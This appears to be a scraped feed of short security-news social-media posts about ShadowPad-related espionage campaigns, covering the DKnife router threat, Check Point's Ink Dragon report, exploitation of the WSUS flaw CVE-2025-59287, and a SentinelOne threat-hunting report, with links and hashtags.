DKnife – nowy cyberzagrożenie w routerach zmienia zasady bezpieczeństwa sieci
Czy Twój router to tylko nudne pudełko do Wi-Fi? DKnife pokazuje, że to może być idealna budka podsłuchowa – tuż przy drzwiach Twojej sieci.
Czytaj dalej:
https://pressmind.org/dknife-nowy-cyberzagrozenie-w-routerach-zmienia-zasady-bezpieczenstwa-sieci/
#PressMindLabs #aitm #darknimbus #dknife #routery #shadowpad
#CheckPoint Research revealed a sophisticated wave of attacks attributed to the Chinese #threat actor #InkDragon, which targets European governments while continuing campaigns in Southeast Asia and South America. The threat actor converts compromised #IIS servers into relay nodes with #ShadowPad, exploits predictable configuration keys for access, and deploys a new #FinalDraft #backdoor for exfiltration and lateral movement.
https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/
Key Findings Introduction Check Point Research tracks a sustained, highly capable espionage cluster, which we refer to as Ink Dragon, and is referenced in other reports as CL-STA-0049, Earth Alux, or REF7707. This cluster is assessed by several vendors to be PRC-aligned. Since at least early 2023, Ink Dragon has repeatedly targeted government, telecom, and […]
Key Findings Introduction Check Point Research tracks a sustained, highly capable espionage cluster, which we refer to as Ink Dragon, and is referenced in other reports as CL-STA-0049, Earth Alux, or REF7707. This cluster is assessed by several vendors to be PRC-aligned. Since at least early 2023, Ink Dragon has repeatedly targeted government, telecom, and […]
📰 ShadowPad Backdoor Deployed via Critical WSUS Server Vulnerability
🔥 CRITICAL: Chinese APTs are actively exploiting a WSUS RCE vulnerability (CVE-2025-59287) to deploy the ShadowPad backdoor. Attackers gain SYSTEM access for espionage. Patching is urgent! #ThreatIntel #CVE #ShadowPad #CyberAttack
Threat actors are actively exploiting CVE-2025-59287 in WSUS to deploy ShadowPad.
ASEC notes the attackers used PowerCat for shell access, then fetched and installed ShadowPad with certutil/curl, executing it through DLL side-loading.
How are you securing WSUS or other update infrastructure in your environment?
💬 Share your insights
⭐ Follow TechNadu for timely threat intel
#infosec #WSUS #ShadowPad #CVE2025 #malware #threatintel #sysadmin #DFIR #TechNadu
Good day everyone!
This is a really interesting read from SentinelOne Labs . Back in October 2024 they dealt with a reconnaissance operation that was related to the activity cluster tracked as #PurpleHaze and then in 2025 "they helped disrupt an intrusion linked to a wider #ShadowPad operation". The activity was attributed to China-nexus threat actors.
The article gives an in-depth view of what it looks like when an organization that is responsible for "IT services and logistics" gets compromised, which we could call a supply-chain attack. The article also provides a TON of technical details about tools and infrastructure that was used, indicators of compromise to scan for in your environment, and behaviors and commands that were observed throughout. This one may take a while to read but its worth it! Thanks to the researchers Dr Aleksandar Milenkoski and Tom Hegel for this report! I hope you all enjoy it as much as I did. Happy Hunting!
Follow the Smoke | China-nexus Threat Actors Hammer At the Doors of Top Tier Targets
https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday
PressMind Labs
Daniel Kuhl ✌🏻☮️☕️
The Threat Codex
CyberNetsecIO
securityaffairs
TechNadu
Just Another Blue Teamer
Benjamin Carr, Ph.D. 👨🏻💻🧬